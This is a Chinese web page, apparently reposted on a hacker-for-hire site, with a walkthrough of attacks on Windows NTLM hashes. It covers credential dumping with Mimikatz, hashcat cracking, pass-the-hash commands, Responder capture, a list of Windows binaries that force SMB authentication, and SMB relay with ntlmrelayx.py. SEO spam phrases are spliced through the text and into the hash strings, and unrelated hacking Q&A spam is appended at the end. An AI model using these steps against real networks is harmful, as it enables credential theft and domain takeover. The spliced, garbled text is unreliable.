首页 黑客接单正文

浏览被黑客攻击的网站-怎么做黑客-内网渗透——针对hash的攻击

hacker 黑客接单 2020-11-11 201 4

如何做 *** 黑客-内网渗透——对于hash的攻击

文中从hash获得 *** ,工程爆破hash,hash中转,中继等层面全方位剖析,以直观详尽的实践活动来掌握攻击过程,过程较为详尽,请细心收看。

 

0x02 什么叫NTLM-hash、net NTLM-hash

NTLM hash是windows账户密码的一种hash,可从Windows系统软件中的SAM文档和域控的NTDS.dit文档中得到 全部客户的hash(例如用Mimikatz获取),获得该hash以后,可开展工程爆破密文、hach传送(PtH攻击),

Net-NTLM的hash是根据NTLM的hash值历经一定的优化算法造成的,获得Net-NTLM的hash以后,可开展工程爆破密文、运用 *** b开展中继攻击,访问 被 *** 黑客攻击的网址该hash不可以开展hach传送攻击。

什么叫NTLM hash?

NTLM hash的形成方式:

1、将密文动态口令转化成十六进制的文件格式

2、把十六进制转化成Unicode文件格式,每一个字节数以后加上0x00

3、再对Unicode字符串数组作MD4数据加密,形成32位系统的十六进制数字串

这儿我根据mimikatz专用工具先直观的掌握NTLM hash,mimikatz立即从 lsass.exe 里获得windows处在active情况账户弱密码,以windows server2012为例子:

从 *** 问 被 *** 黑客攻击的网址图发觉:

NTLM hash:A1E32A2281B8C6DBC2373BFF87E8CB6E

弱密码:123456Abc

 

0x03 对NTLM hash暴力破解密码

假如根据其他方式得到 此hash,即A1E32A2281B8C6DBC2373BFF87E8CB6E,能用hashcat开展词典暴力破解密码,Hashcat主要参数以下:

hashcat64.exe -m 1000 A1E32A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

主要参数表明:

-m 挑选hach类型,1000为NTLM

-o 輸出破译取得成功的密文

example.dict 密文词典

开启out.txt,发觉密文123456Abc

留意:

因为windows server2012 r2、windwos 8.1及其高些版本号都干了结构加固,即严禁密文缓存文件到运行内存,而mimikatz是根据运行内存获得弱密码,则没法立即根据mimikatz获得密文访问 被 *** 黑客攻击的网址登陆密码,立即获取結果为“null”,但可根据修改注册表来获得。

参照

受维护客户 ( Protected Users )

http://www.bubuko.com/infodetail-2077149.html

 

0x04 NTLMhach传送

hach传送通俗化而言,便是不用密文登陆,用NTLM hash可立即开展登陆。

在大家应用某服务项目时,Windows会携带本身的验证信息内容开展试着登陆,这一验证信息内容实际上便是Net-NTLM的Hash,大家应用什么服务项目会让Windows携带本身验证信息内容登陆?如浏览 *** b共享文件夹名称等访问 被 *** 黑客攻击的网址,这时会应用验证信息内容试着登陆,而且启用lsass运行内存中的hash缓存文件试着登陆,这时应用mimikatz等专用工具改动缓存文件的hash为获得获得的hash,进而应用改动的hash开展登陆,它是hach传送的基本原理。文章内容后边提到的获得Net-NTLM的hash,实际上便是运用带验证信息内容浏览 *** b,如让管理人员浏览此wdb:<img src="\\192.168.191.129xx">,192.168.191.129被攻击者操纵的一台内部网PC,可获得管理人员的Net-NTLM hash。

先讲下验证要求过程:

1、手机客户端先向在当地对密码加密变成登陆密码散列

2、手机客户端推送验证要求,即产生密文账户访问 被 *** 黑客攻击的网址

3、缺少对象一个16位的随机数字发给手机客户端,做为一个 challenge

4、手机客户端再用流程1的登陆密码散列来数据加密这一 challenge ,做为 response回到给 *** 服务器。

5、 *** 服务器把登录名、给手机客户端的challenge 、手机客户端回到的 response ,推送域控制器

6、域控制器应用此登录名在SAM账号管理库的登陆密码散列,数据加密给手机客户端的challenge

7、与流程4手机客户端数据加密的challenge较为,假如2个challenge一致,验证取得成功

hach传送系统漏洞产生在流程4中,立即应用改动缓存文件后的hash,开展challenge数据加密,对challenge 数据加密的hash早已并不是推送账户相匹配的hash,只是攻击者根据别的方式获得的hash开展challenge数据加密。

Pth攻击演试:

吊舱ip:

攻击机ip:

假定早已得到 NTLM hash:

管理员身份运作mimikatz:

mimikatz运行命令主要参数:

sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E32A2281B8C6DBC2373BFF87E8CB6E

这时再开展其他验证实际操作,可立即用获得的总体目标hash开展登陆验证。

 

访问 被 *** 黑客攻击的网址0x05 Net-NTLM hash获得

Net-NTLM hash不可以立即获得,根据Responder专用工具开展阻拦获得,此hash不可以开展hach传送,但可开展中继分享,运用Responder等中介人专用工具,融合其他专用工具可自动化技术开展阻拦获得并中继分享,其他专用工具如 Impacket的ntlmrelayx.py开展中继分享。

在攻击机里运作Responder,这时攻击机仿真模拟为 *** B服务项目让受害人开展验证登陆,根据设定好多个仿真模拟的故意守护进程(如SQL *** 服务器,FTP,HTTP和 *** B *** 服务器等)来立即提醒凭证或仿真模拟咨询 – 回应认证过程并捕捉手机客户端推送的必需 访问 被 *** 黑客攻击的网址 hash,当受害人设备试着登录攻击者设备,responder就可以获得受害人设备客户的NTLMv2hash值。。

Responder下载安裝:

https://github.com/lgandx/Responder

Responder实际操作演试

手机客户端IP:

攻击机IP:

1、 不用编写Responder.conf,由于这时 *** B、HTTP服务项目不必关掉,等中继攻击时才关掉这两个服务项目。因而这儿先演试Responder怎么获取net-NTLM 访问 被 *** 黑客攻击的网址 hash,在中继攻击里关掉 *** B、HTTP,是由于这时已不由Responder获得hash,只是立即让ntlmrelayx.py来进行这一每日任务。

2、 攻击机实行 python Responder.py -I eth0,这时处在监视情况

3、 运用 *** B协议,手机客户端在联接服务器端时,默认设置先应用该设备的登录名和登陆密码hash试着登陆,因此 能够仿真模拟 *** B *** 服务器进而捕获hash,实行以下指令都能够获得hash。

手机客户端实行以下指令,攻击机的Responder能接到。

> net.exe use \\hostshare 访问 被 *** 黑客攻击的网址

> attrib.exe \\hostshare

> bcdboot.exe \\hostshare

> bdeunlock.exe \\hostshare

> cacls.exe \\hostshare

> certreq.exe \\hostshare #(noisy, pops an error dialog)

> certutil.exe \\hostshare

> cipher.exe \\hostshare

> ClipUp.exe -l \\hostshare

> cmdl32.exe \\hostshare 访问 被 *** 黑客攻击的网址

> cmstp.exe /s \\hostshare

> colorcpl.exe \\hostshare #(noisy, pops an error dialog)

> comp.exe /N=0 \\hostshare \\hostshare

> compact.exe \\hostshare

> control.exe \\hostshare

> convertvhd.exe -source \\hostshare -destination \\hostshare

> Defrag.exe \\hostshare

> 访问 被 *** 黑客攻击的网址 diskperf.exe \\hostshare

> dispdiag.exe -out \\hostshare

> doskey.exe /MACROFILE=\\hostshare

> esentutl.exe /k \\hostshare

> expand.exe \\hostshare

> extrac32.exe \\hostshare

> FileHistory.exe \\hostshare #(noisy, pops a gui)

> findstr.exe * \\hostshare

> fontview.exe 访问 被 *** 黑客攻击的网址 \\hostshare #(noisy, pops an error dialog)

> fvenotify.exe \\hostshare #(noisy, pops an access denied error)

> FXSCOVER.exe \\hostshare #(noisy, pops GUI)

> hwrcomp.exe -check \\hostshare

> hwrreg.exe \\hostshare

> icacls.exe \\hostshare

{X }> licensingdiag.exe -cab \hostshare

> lodctr.exe 浏览被黑客攻击的网站 \hostshare

> lpksetup.exe /p \hostshare /s

> makecab.exe \hostshare

> msiexec.exe /update \hostshare /quiet

> msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog)

> mspaint.exe \hostshare #(noisy, invalid path to png error)

> msra.exe /openfile \hostshare #(noisy, 浏览被黑客攻击的网站 error)

> mstsc.exe \hostshare #(noisy, error)

> netcfg.exe -l \hostshare -c p -i foo

客户端执行 net use 192.168.191.131aaa

4、 攻击机成功收到NTLMv2-SSP Hash

Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000浏览被黑客攻击的网站4000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000

爆破net-NTLM hash

继续用hashcat进行hash爆破,Hashcat参数如下:

hashcat64.exe -m 5600 浏览被黑客攻击的网站 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E0浏览被黑客攻击的网站06C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E003100330031000000000000000000000浏览被黑客攻击的网站00000 example.dict -o out.txt --force

参数说明:

-m 选择哈希类别,5600为net-NTLM

成功破解出明文密码,如下图:

打开out.txt,发现破解出明文123456Abc

 

0x06 *** B中继攻击

前面文章说过了,当获取到net-NTLM hash之后,由于不能通过类似哈希传递的修改缓存hash进行认证,此hash无法进行哈希传递,怎么进行攻击呢?可通过Responder工具拦截管理员的net-NTLM 浏览被黑客攻击的网站 hash,配合ntlmrelayx.py进行中继转发。

Impacket下载:

git clone https://github.com/CoreSecurity/impacket.git

进行中继前提:目标 *** B签名需要关闭,在 *** B连接中,需要使用安全机制来保护服务器和客户端之间传输数据的完整性,而这种安全机制就是 *** B签名和加密,如果关闭 *** B签名,会允许攻击者拦截认证过程,并且将获得hash在其他机器上进行重放,,从而获得域管权限。

目前 *** B常用来做为 *** B文件共享、打印机,如果签名关闭,可能导致文件共享、打印机被入侵。

比如我用虚拟机搭建的 *** B文件共享如下,具体认证登录过程文章前面部分已讲过,看看这个效果:

虚拟机IP:1浏览被黑客攻击的网站92.168.191.139

先探测目标是否已关闭 *** B签名,命令如下:

nmap --script *** b-security-mode.nse -p445 192.168.191.139 --open

如下是我用虚拟机搭建的域控环境测试,中继转发操作:

域内普通用户-受害者机器(win7)

域管理员(administrator)机器(windows server 2012 r2)

kali linux 攻击者机器

1、Responder关闭 *** B、HTTP

2、执行python Responder.py -I eth0 -r -d –w

3、执行python ntlmrelayx.py 浏览被黑客攻击的网站 -tf targets.txt -socks - *** b2support

说明 :

targets.txt内容为域内受害IP 192.168.191.139

python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //

4、域管模拟输入一个共享,生成一个LLMNR请求

5、通过Responder发送

6、NTLMv2哈希凭据被中继

攻击流程总结:

1、关闭Responder的 *** B和HTTP服务, 运行Responder工具来截取Net-NTLM哈希值

2、运行ntlmrelayx.py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务

3、ntlmrelayx.py将hash发送到目标列表中,如果中继操作执行成功会触发通知命令。

这里先大概熟悉下中继转发的原理基础,在下一篇会结合DeathStar和Empire,演示自动化域渗透,以及对net NTLM-hash的利用。

本文由安全客原创发布 


转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/177123 


安全客 - 有思想的安全新媒体

 

这种情况是很有可能的,只要出现这种问题手机也是很容易中病毒的。所以更好升级一下手机系统。升级的 *** 有许多种,你可以在手机自身的系统升级功能对手机。怎么做黑客

*** 迷yao暗语。相同的问题,有人会吗拜托,做这种图片跟黑客一毛钱关系都没有,随便一个会PS的都可以做出这种图片。

怎么做黑客不是说有cookie或者能上传就一定可以上传的,现在很多程序都检测浏览被黑客攻击的网站了文件后缀名,部分有漏洞可以通过双文件,截断等方式绕过,但具体得看上传时的一些情况从图中看到 都是用主机访问其他主机的80端口,即浏览网页,至于135、445、1025大都是windows系统默认开启的端口(虽然。

假的,我也上过当,被骗了二千元整。就当给黄志炜先生吃药了烧纸钱了。祝骗子们早点到阴间报到。

很简单,有一款软件叫做灰鸽子,如果我没猜错的话对方应该发了个软件给你并交你打开了吧?如果你别控制了,你的电脑就叫"肉鸡" *** 的出现在。怎么做黑客

黑客一般用kalilinux系统。一般黑客很少针对个人进行攻击,如果针对个人那么可以用钓鱼网站和木马软件,靶机点开钓鱼网站或木马软件后,你的终端就能看见靶机的。

怎么做黑客本书为黑客江湖1、2合集,是全本。楼主你好浏览被黑客攻击的网站,我是之一个发送的啊很高兴为你回答问题呀~请稍等一下呢,所需资源正在发送中哦~~◇没有收到的话。

标签:

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。